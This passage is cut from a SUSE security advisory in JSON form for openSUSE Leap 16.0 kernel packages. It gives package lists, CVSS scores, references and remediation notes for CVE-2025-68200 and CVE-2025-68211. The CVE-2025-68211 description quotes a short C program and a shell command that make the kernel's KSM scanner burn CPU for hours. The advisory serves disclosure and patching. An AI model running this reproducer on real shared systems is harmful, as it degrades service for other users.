"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksm: use range-walk function to jump over holes in scan_get_next_rmap_item\n\nCurrently, scan_get_next_rmap_item() walks every page address in a VMA to\nlocate mergeable pages. This becomes highly inefficient when scanning\nlarge virtual memory areas that contain mostly unmapped regions, causing\nksmd to use large amount of cpu without deduplicating much pages.\n\nThis patch replaces the per-address lookup with a range walk using\nwalk_page_range(). The range walker allows KSM to skip over entire\nunmapped holes in a VMA, avoiding unnecessary lookups. This problem was\npreviously discussed in [1].\n\nConsider the following test program which creates a 32 TiB mapping in the\nvirtual address space but only populates a single page:\n\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/mman.h\u003e\n\n/* 32 TiB */\nconst size_t size = 32ul * 1024 * 1024 * 1024 * 1024;\n\nint main() {\n char *area = mmap(NULL, size, PROT_READ | PROT_WRITE,\n MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0);\n\n if (area == MAP_FAILED) {\n perror(\"mmap() failed\\n\");\n return -1;\n }\n\n /* Populate a single page such that we get an anon_vma. */\n *area = 0;\n\n /* Enable KSM. */\n madvise(area, size, MADV_MERGEABLE);\n pause();\n return 0;\n}\n\n$ ./ksm-sparse \u0026\n$ echo 1 \u003e /sys/kernel/mm/ksm/run \n\nWithout this patch ksmd uses 100% of the cpu for a long time (more then 1\nhour in my test machine) scanning all the 32 TiB virtual address space\nthat contain only one mapped page. This makes ksmd essentially deadlocked\nnot able to deduplicate anything of value. With this patch ksmd walks\nonly the one mapped page and skips the rest of the 32 TiB virtual address\nspace, making the scan fast using little cpu.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68211",
"url": "https://www.suse.com/security/cve/CVE-2025-68211"
},
{
"category": "external",
"summary": "SUSE Bug 1255319 for CVE-2025-68211",
"url": "https://bugzilla.suse.com/1255319"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
